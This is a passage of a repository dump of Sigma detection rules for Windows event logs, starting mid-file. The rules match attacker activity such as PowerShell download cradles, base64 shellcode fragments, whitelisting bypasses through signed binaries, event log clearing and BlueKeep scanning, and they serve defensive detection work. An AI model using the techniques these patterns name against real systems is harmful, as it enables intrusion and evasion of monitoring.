24 | condition: selection1 and selection2
25 | falsepositives:
26 | - Potential Admin Activity
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_b64_shellcode.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Base64 Encoded Shellcode
2 | id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
3 | description: Detects Base64 encoded Shellcode
4 | status: experimental
5 | references:
6 | - https://twitter.com/cyb3rops/status/1063072865992523776
7 | author: Florian Roth
8 | date: 2018/11/17
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*AAAAYInlM*'
18 | selection2:
19 | CommandLine:
20 | - '*OiCAAAAYInlM*'
21 | - '*OiJAAAAYInlM*'
22 | condition: selection1 and selection2
23 | falsepositives:
24 | - Unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_dll_execution.yml:
--------------------------------------------------------------------------------
1 | title: Detection of PowerShell Execution via DLL
2 | id: 6812a10b-60ea-420c-832f-dfcc33b646ba
3 | status: experimental
4 | description: Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll
5 | references:
6 | - https://github.com/p3nt4/PowerShdll/blob/master/README.md
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | - car.2014-04-003
11 | author: Markus Neis
12 | date: 2018/08/25
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection1:
18 | Image:
19 | - '*\rundll32.exe'
20 | selection2:
21 | Description:
22 | - '*Windows-Hostprozess (Rundll32)*'
23 | selection3:
24 | CommandLine:
25 | - '*Default.GetString*'
26 | - '*FromBase64String*'
27 | condition: (selection1 or selection2) and selection3
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_download.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Download from URL
2 | id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
3 | status: experimental
4 | description: Detects a Powershell process that contains download commands in its command line string
5 | author: Florian Roth
6 | tags:
7 | - attack.t1086
8 | - attack.execution
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image: '*\powershell.exe'
15 | CommandLine:
16 | - '*new-object system.net.webclient).downloadstring(*'
17 | - '*new-object system.net.webclient).downloadfile(*'
18 | - '*new-object net.webclient).downloadstring(*'
19 | - '*new-object net.webclient).downloadfile(*'
20 | condition: selection
21 | fields:
22 | - CommandLine
23 | - ParentCommandLine
24 | falsepositives:
25 | - unknown
26 | level: medium
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_xor_commandline.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious XOR Encoded PowerShell Command Line
2 | id: bb780e0c-16cf-4383-8383-1e5471db6cf9
3 | description: Detects suspicious powershell process which includes bxor command, alternatvide obfuscation method to b64 encoded commands.
4 | status: experimental
5 | author: Sami Ruohonen
6 | date: 2018/09/05
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | detection:
11 | selection:
12 | CommandLine:
13 | - '* -bxor*'
14 | condition: selection
15 | falsepositives:
16 | - unknown
17 | level: medium
18 | logsource:
19 | category: process_creation
20 | product: windows
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_process_creation_bitsadmin_download.yml:
--------------------------------------------------------------------------------
1 | title: Bitsadmin Download
2 | id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
3 | status: experimental
4 | description: Detects usage of bitsadmin downloading a file
5 | references:
6 | - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
7 | - https://isc.sans.edu/diary/22264
8 | tags:
9 | - attack.defense_evasion
10 | - attack.persistence
11 | - attack.t1197
12 | - attack.s0190
13 | author: Michael Haag
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | Image:
20 | - '*\bitsadmin.exe'
21 | CommandLine:
22 | - /transfer
23 | condition: selection
24 | fields:
25 | - CommandLine
26 | - ParentCommandLine
27 | falsepositives:
28 | - Some legitimate apps use this, but limited.
29 | level: medium
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_psexesvc_start.yml:
--------------------------------------------------------------------------------
1 | title: PsExec Service Start
2 | id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
3 | description: Detects a PsExec service start
4 | author: Florian Roth
5 | date: 2018/03/13
6 | modified: 2012/12/11
7 | tags:
8 | - attack.execution
9 | - attack.t1035
10 | - attack.s0029
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | ProcessCommandLine: C:\Windows\PSEXESVC.exe
17 | condition: selection
18 | falsepositives:
19 | - Administrative activity
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Rare Scheduled Task Creations
2 | id: b20f6158-9438-41be-83da-a5a16ac90c2b
3 | status: experimental
4 | description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count
5 | function selects tasks with rare names.
6 | tags:
7 | - attack.persistence
8 | - attack.t1053
9 | - attack.s0111
10 | author: Florian Roth
11 | logsource:
12 | product: windows
13 | service: taskscheduler
14 | detection:
15 | selection:
16 | EventID: 106
17 | timeframe: 7d
18 | condition: selection | count() by TaskName < 5
19 | falsepositives:
20 | - Software installation
21 | level: low
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_service_installs.yml:
--------------------------------------------------------------------------------
1 | title: Rare Service Installs
2 | id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
3 | description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious
4 | services
5 | status: experimental
6 | author: Florian Roth
7 | tags:
8 | - attack.persistence
9 | - attack.privilege_escalation
10 | - attack.t1050
11 | - car.2013-09-005
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045
18 | timeframe: 7d
19 | condition: selection | count() by ServiceFileName < 5
20 | falsepositives:
21 | - Software installation
22 | - Software updates
23 | level: low
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_bluekeep_poc_scanner.yml:
--------------------------------------------------------------------------------
1 | title: Scanner PoC for CVE-2019-0708 RDP RCE vuln
2 | id: 8400629e-79a9-4737-b387-5db940ab2367
3 | description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
4 | references:
5 | - https://twitter.com/AdamTheAnalyst/status/1134394070045003776
6 | - https://github.com/zerosum0x0/CVE-2019-0708
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1210
10 | - car.2013-07-002
11 | author: Florian Roth (rule), Adam Bradbury (idea)
12 | date: 2019/06/02
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4625
19 | AccountName: AAAAAAA
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_localhost_login.yml:
--------------------------------------------------------------------------------
1 | title: RDP Login from localhost
2 | id: 51e33403-2a37-4d66-a574-1fda1782cc31
3 | description: RDP login with localhost source address may be a tunnelled login
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/28
7 | modified: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.t1076
11 | - car.2013-07-002
12 | status: experimental
13 | author: Thomas Patzke
14 | logsource:
15 | product: windows
16 | service: security
17 | detection:
18 | selection:
19 | EventID: 4624
20 | LogonType: 10
21 | SourceNetworkAddress:
22 | - "::1"
23 | - "127.0.0.1"
24 | condition: selection
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_potential_cve-2019-0708.yml:
--------------------------------------------------------------------------------
1 | title: Potential RDP exploit CVE-2019-0708
2 | id: aaa5b30d-f418-420b-83a0-299cb6024885
3 | description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
4 | references:
5 | - https://github.com/zerosum0x0/CVE-2019-0708
6 | - https://github.com/Ekultek/BlueKeep
7 | tags:
8 | - attack.initial_access
9 | - attack.lateral_movement
10 | - attack.t1210
11 | - attack.t1190
12 | - car.2013-07-002
13 | status: experimental
14 | author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)"
15 | logsource:
16 | product: windows
17 | service: system
18 | detection:
19 | selection:
20 | EventID:
21 | - 56
22 | - 50
23 | Source: TermDD
24 | condition: selection
25 | falsepositives:
26 | - Bad connections or network interruptions
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_reverse_tunnel.yml:
--------------------------------------------------------------------------------
1 | title: RDP over Reverse SSH Tunnel WFP
2 | id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
3 | status: experimental
4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
5 | references:
6 | - https://twitter.com/SBousseaden/status/1096148422984384514
7 | author: Samir Bousseaden
8 | date: 2019/02/16
9 | tags:
10 | - attack.defense_evasion
11 | - attack.command_and_control
12 | - attack.t1076
13 | - car.2013-07-002
14 | logsource:
15 | product: windows
16 | service: security
17 | detection:
18 | selection:
19 | EventID: 5156
20 | sourceRDP:
21 | SourcePort: 3389
22 | DestinationAddress:
23 | - '127.*'
24 | - '::1'
25 | destinationRDP:
26 | DestinationPort: 3389
27 | SourceAddress:
28 | - '127.*'
29 | - '::1'
30 | condition: selection and ( sourceRDP or destinationRDP )
31 | falsepositives:
32 | - unknown
33 | level: high
34 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_sdbinst_shim_persistence.yml:
--------------------------------------------------------------------------------
1 | title: Possible Shim Database Persistence via sdbinst.exe
2 | id: 517490a7-115a-48c6-8862-1a481504d5a8
3 | status: experimental
4 | description: Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
7 | tags:
8 | - attack.persistence
9 | - attack.t1138
10 | author: Markus Neis
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | Image:
17 | - '*\sdbinst.exe'
18 | CommandLine:
19 | - '*.sdb*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_service_execution.yml:
--------------------------------------------------------------------------------
1 | title: Service Execution
2 | id: 2a072a96-a086-49fa-bcb5-15cc5a619093
3 | status: experimental
4 | description: Detects manual service execution (start) via system utilities
5 | author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
6 | date: 2019/10/21
7 | modified: 2019/11/04
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image|endswith:
16 | - '\net.exe'
17 | - '\net1.exe'
18 | CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression
19 | condition: selection
20 | falsepositives:
21 | - Legitimate administrator or user executes a service for legitimate reason
22 | level: low
23 | tags:
24 | - attack.execution
25 | - attack.t1035
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_spn_enum.yml:
--------------------------------------------------------------------------------
1 | title: Possible SPN Enumeration
2 | id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
3 | description: Detects Service Principal Name Enumeration used for Kerberoasting
4 | status: experimental
5 | references:
6 | - https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
7 | author: Markus Neis, keepwatch
8 | date: 2018/11/14
9 | tags:
10 | - attack.credential_access
11 | - attack.t1208
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection_image:
17 | Image: '*\setspn.exe'
18 | selection_desc:
19 | Description: '*Query or reset the computer* SPN attribute*'
20 | cmd:
21 | CommandLine: '*-q*'
22 | condition: (selection_image or selection_desc) and cmd
23 | falsepositives:
24 | - Administrator Activity
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_add_sid_history.yml:
--------------------------------------------------------------------------------
1 | title: Addition of SID History to Active Directory Object
2 | id: 2632954e-db1c-49cb-9936-67d1ef1d17d2
3 | status: stable
4 | description: An attacker can use the SID history attribute to gain additional privileges.
5 | references:
6 | - https://adsecurity.org/?p=1772
7 | author: Thomas Patzke, @atc_project (improvements)
8 | tags:
9 | - attack.persistence
10 | - attack.privilege_escalation
11 | - attack.t1178
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection1:
17 | EventID:
18 | - 4765
19 | - 4766
20 | selection2:
21 | EventID: 4738
22 | selection3:
23 | SidHistory:
24 | - '-'
25 | - '%%1793'
26 | condition: selection1 or (selection2 and not selection3)
27 | falsepositives:
28 | - Migration of an account into a new domain
29 | level: medium
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_backup_delete.yml:
--------------------------------------------------------------------------------
1 | title: Backup Catalog Deleted
2 | id: 9703792d-fd9a-456d-a672-ff92efe4806a
3 | status: experimental
4 | description: Detects backup catalog deletions
5 | references:
6 | - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
7 | - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
8 | author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1107
12 | logsource:
13 | product: windows
14 | service: application
15 | detection:
16 | selection:
17 | EventID: 524
18 | Source: Backup
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_bcdedit.yml:
--------------------------------------------------------------------------------
1 | title: Possible Ransomware or unauthorized MBR modifications
2 | id: c9fbe8e9-119d-40a6-9b59-dd58a5d84429
3 | status: experimental
4 | description: Detects, possibly, malicious unauthorized usage of bcdedit.exe
5 | references:
6 | - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set
7 | author: '@neu5ron'
8 | date: 2019/02/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1070
12 | - attack.persistence
13 | - attack.t1067
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | NewProcessName: '*\bcdedit.exe'
20 | ProcessCommandLine:
21 | - '*delete*'
22 | - '*deletevalue*'
23 | - '*import*'
24 | condition: selection
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_bginfo.yml:
--------------------------------------------------------------------------------
1 | title: Application whitelisting bypass via bginfo
2 | id: aaf46cdc-934e-4284-b329-34aa701e3771
3 | status: experimental
4 | description: Execute VBscript code that is referenced within the *.bgi file.
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml
7 | - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\bginfo.exe'
22 | CommandLine|contains|all:
23 | - '/popup'
24 | - '/nolicprompt'
25 | condition: selection
26 | falsepositives:
27 | - Unknown
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_calc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Calculator Usage
2 | id: 737e618a-a410-49b5-bec3-9e55ff7fbc15
3 | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
4 | status: experimental
5 | references:
6 | - https://twitter.com/ItsReallyNick/status/1094080242686312448
7 | author: Florian Roth
8 | date: 2019/02/09
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*\calc.exe *'
18 | selection2:
19 | Image: '*\calc.exe'
20 | filter2:
21 | Image: '*\Windows\Sys*'
22 | condition: selection1 or ( selection2 and not filter2 )
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_cdb.yml:
--------------------------------------------------------------------------------
1 | title: Possible Application Whitelisting Bypass via WinDbg/CDB as a shellcode runner
2 | id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2
3 | status: experimental
4 | description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml
7 | - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\cdb.exe'
22 | CommandLine|contains: '-cf'
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of debugging tools
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_codeintegrity_check_failure.yml:
--------------------------------------------------------------------------------
1 | title: Failed Code Integrity Checks
2 | id: 470ec5fa-7b4e-4071-b200-4c753100f49b
3 | status: stable
4 | description: Code integrity failures may indicate tampered executables.
5 | author: Thomas Patzke
6 | tags:
7 | - attack.defense_evasion
8 | - attack.t1009
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID:
15 | - 5038
16 | - 6281
17 | condition: selection
18 | falsepositives:
19 | - Disk device errors
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_control_dll_load.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Control Panel DLL Load
2 | id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819
3 | status: experimental
4 | description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
5 | author: Florian Roth
6 | date: 2017/04/15
7 | references:
8 | - https://twitter.com/rikvduijn/status/853251879320662017
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1073
12 | - attack.t1085
13 | - car.2013-10-002
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | ParentImage: '*\System32\control.exe'
20 | CommandLine: '*\rundll32.exe *'
21 | filter:
22 | CommandLine: '*Shell32.dll*'
23 | condition: selection and not filter
24 | fields:
25 | - CommandLine
26 | - ParentCommandLine
27 | falsepositives:
28 | - Unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_csc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Parent of Csc.exe
2 | id: b730a276-6b63-41b8-bcf8-55930c8fc6ee
3 | description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
4 | status: experimental
5 | references:
6 | - https://twitter.com/SBousseaden/status/1094924091256176641
7 | author: Florian Roth
8 | date: 2019/02/11
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\csc.exe*'
18 | ParentImage:
19 | - '*\wscript.exe'
20 | - '*\cscript.exe'
21 | - '*\mshta.exe'
22 | condition: selection
23 | falsepositives:
24 | - Unkown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_csc_folder.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Csc.exe Source File Folder
2 | id: dcaa3f04-70c3-427a-80b4-b870d73c94c4
3 | description: Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)
4 | status: experimental
5 | references:
6 | - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/
7 | - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
8 | - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/
9 | author: Florian Roth
10 | date: 2019/08/24
11 | modified: 2019/08/31
12 | tags:
13 | - attack.defense_evasion
14 | - attack.t1500
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | Image: '*\csc.exe'
21 | CommandLine:
22 | - '*\AppData\\*'
23 | - '*\Windows\Temp\\*'
24 | condition: selection
25 | falsepositives:
26 | - Unkown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_devtoolslauncher.yml:
--------------------------------------------------------------------------------
1 | title: Devtoolslauncher.exe executes specified binary
2 | id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6
3 | status: experimental
4 | description: The Devtoolslauncher.exe executes other binary
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml
7 | - https://twitter.com/_felamos/status/1179811992841797632
8 | author: Beyu Denis, oscd.community (rule), @_felamos (idea)
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: critical
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\devtoolslauncher.exe'
22 | CommandLine|contains: 'LaunchForDeploy'
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of devtoolslauncher.exe by legitimate user
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dhcp_config.yml:
--------------------------------------------------------------------------------
1 | title: DHCP Server Loaded the CallOut DLL
2 | id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40
3 | status: experimental
4 | description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
5 | references:
6 | - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html
7 | - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx
8 | - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
9 | date: 2017/05/15
10 | author: Dimitrios Slamaris
11 | tags:
12 | - attack.defense_evasion
13 | - attack.t1073
14 | logsource:
15 | product: windows
16 | service: system
17 | detection:
18 | selection:
19 | EventID: 1033
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dns_config.yml:
--------------------------------------------------------------------------------
1 | title: DNS Server Error Failed Loading the ServerLevelPluginDLL
2 | id: cbe51394-cd93-4473-b555-edf0144952d9
3 | description: This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
4 | status: experimental
5 | date: 2017/05/08
6 | references:
7 | - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
8 | - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx
9 | - https://twitter.com/gentilkiwi/status/861641945944391680
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1073
13 | author: Florian Roth
14 | logsource:
15 | product: windows
16 | service: dns-server
17 | detection:
18 | selection:
19 | EventID:
20 | - 150
21 | - 770
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 | level: critical
26 |
27 |
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dnx.yml:
--------------------------------------------------------------------------------
1 | title: Application Whitelisting bypass via dnx.exe
2 | id: 81ebd28b-9607-4478-bf06-974ed9d53ed7
3 | status: experimental
4 | description: Execute C# code located in the consoleapp folder
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml
7 | - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\dnx.exe'
22 | condition: selection
23 | falsepositives:
24 | - Legitimate use of dnx.exe by legitimate user
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dsrm_password_change.yml:
--------------------------------------------------------------------------------
1 | title: Password Change on Directory Service Restore Mode (DSRM) Account
2 | id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
3 | status: stable
4 | description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.
5 | references:
6 | - https://adsecurity.org/?p=1714
7 | author: Thomas Patzke
8 | tags:
9 | - attack.persistence
10 | - attack.privilege_escalation
11 | - attack.t1098
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection:
17 | EventID: 4794
18 | condition: selection
19 | falsepositives:
20 | - Initial installation of a domain controller
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dxcap.yml:
--------------------------------------------------------------------------------
1 | title: Application Whitelisting bypass via dxcap.exe
2 | id: 60f16a96-db70-42eb-8f76-16763e333590
3 | status: experimental
4 | description: Detects execution of of Dxcap.exe
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml
7 | - https://twitter.com/harr0ey/status/992008180904419328
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\dxcap.exe'
22 | CommandLine|contains|all:
23 | - '-c'
24 | - '.exe'
25 | condition: selection
26 | falsepositives:
27 | - Legitimate execution of dxcap.exe by legitimate user
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Eventlog Cleared
2 | id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982
3 | description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
4 | references:
5 | - https://twitter.com/deviouspolack/status/832535435960209408
6 | - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
7 | author: Florian Roth
8 | tags:
9 | - attack.defense_evasion
10 | - attack.t1070
11 | - car.2016-04-002
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 104
18 | Source: Microsoft-Windows-Eventlog
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_execution_path.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Non-Executable Folder
2 | id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
3 | status: experimental
4 | description: Detects a suspicious exection from an uncommon folder
5 | author: Florian Roth
6 | tags:
7 | - attack.defense_evasion
8 | - attack.t1036
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\$Recycle.bin'
16 | - '*\Users\All Users\\*'
17 | - '*\Users\Default\\*'
18 | - '*\Users\Public\\*'
19 | - 'C:\Perflogs\\*'
20 | - '*\config\systemprofile\\*'
21 | - '*\Windows\Fonts\\*'
22 | - '*\Windows\IME\\*'
23 | - '*\Windows\addins\\*'
24 | condition: selection
25 | fields:
26 | - CommandLine
27 | - ParentCommandLine
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_execution_path_webserver.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Webserver Root Folder
2 | id: 35efb964-e6a5-47ad-bbcd-19661854018d
3 | status: experimental
4 | description: Detects a suspicious program execution in a web service root folder (filter out false positives)
5 | author: Florian Roth
6 | tags:
7 | - attack.persistence
8 | - attack.t1100
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\wwwroot\\*'
16 | - '*\wmpub\\*'
17 | - '*\htdocs\\*'
18 | filter:
19 | Image:
20 | - '*bin\\*'
21 | - '*\Tools\\*'
22 | - '*\SMSComponent\\*'
23 | ParentImage:
24 | - '*\services.exe'
25 | condition: selection and not filter
26 | fields:
27 | - CommandLine
28 | - ParentCommandLine
29 | falsepositives:
30 | - Various applications
31 | - Tools that include ping or nslookup command invocations
32 | level: medium
33 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_interactive_logons.yml:
--------------------------------------------------------------------------------
1 | title: Interactive Logon to Server Systems
2 | id: 3ff152b2-1388-4984-9cd9-a323323fdadf
3 | description: Detects interactive console logons to
4 | author: Florian Roth
5 | tags:
6 | - attack.lateral_movement
7 | - attack.t1078
8 | logsource:
9 | product: windows
10 | service: security
11 | detection:
12 | selection:
13 | EventID:
14 | - 528
15 | - 529
16 | - 4624
17 | - 4625
18 | LogonType: 2
19 | ComputerName:
20 | - '%ServerSystems%'
21 | - '%DomainControllers%'
22 | filter:
23 | LogonProcessName: Advapi
24 | ComputerName: '%Workstations%'
25 | condition: selection and not filter
